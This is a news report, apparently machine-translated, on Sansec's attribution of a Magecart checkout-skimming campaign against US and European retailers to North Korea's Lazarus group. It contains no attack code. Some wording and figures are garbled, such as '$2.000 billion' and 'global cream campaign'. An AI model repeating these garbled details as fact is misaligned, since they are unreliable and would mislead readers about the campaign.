Websites of several retailers in the United States and Europe have been compromised by credit card skimmer Magecart following a series of cyberattacks allegedly launched by the North Korean state-sponsored Advanced Persistent Threat (APT) group, Lazarus. . So far, North Korean hacking activity has been limited to South Korean banks and cryptocurrency markets, and the country's secret cyber operations have netted hackers $2.000 billion, according to a report published on last year. by the UN. As reported by Computer Weekly, Sansec researcher Willem de Groot first discovered the new campaign, which has been running for more than 12 months. De Groot believes the campaign is financially motivated because raising hard currency can be difficult for North Korea and its government. Details of stolen payment cards purchased from Magecart can be sold for between €5 and €30 on dark web forums, meaning the transaction was likely quite lucrative for the Lazarus group.
Global skimming campaign
According to a Sansec blog article, the Lazarus group used the sites of an Italian modeling agency and a vintage music store in Tehran to run their global cream campaign. To monetize its skimming operations, the group has developed a global exfiltration network that uses compromised websites as a disguise for its criminal activity. The network is also used to funnel stolen assets so they can be sold on dark web marketplaces. Sansec's investigation linked the dots to bring them back to the Lazarus group after identifying multiple independent links between recent skimming activity and previously documented North Korean hacking operations. The company believes the group has used phishing attacks to obtain staff passwords for online shopping sites. Once inside, the hackers injected the malicious Magecart script into the checkout pages of these stores where the skimmer was able to collect customer payment details. Hackers were first discovered to have infiltrated these sites in June last year and Sansec has followed the campaign ever since with unique identifying features and distinctive patterns in the skimmer code. Via Computer Weekly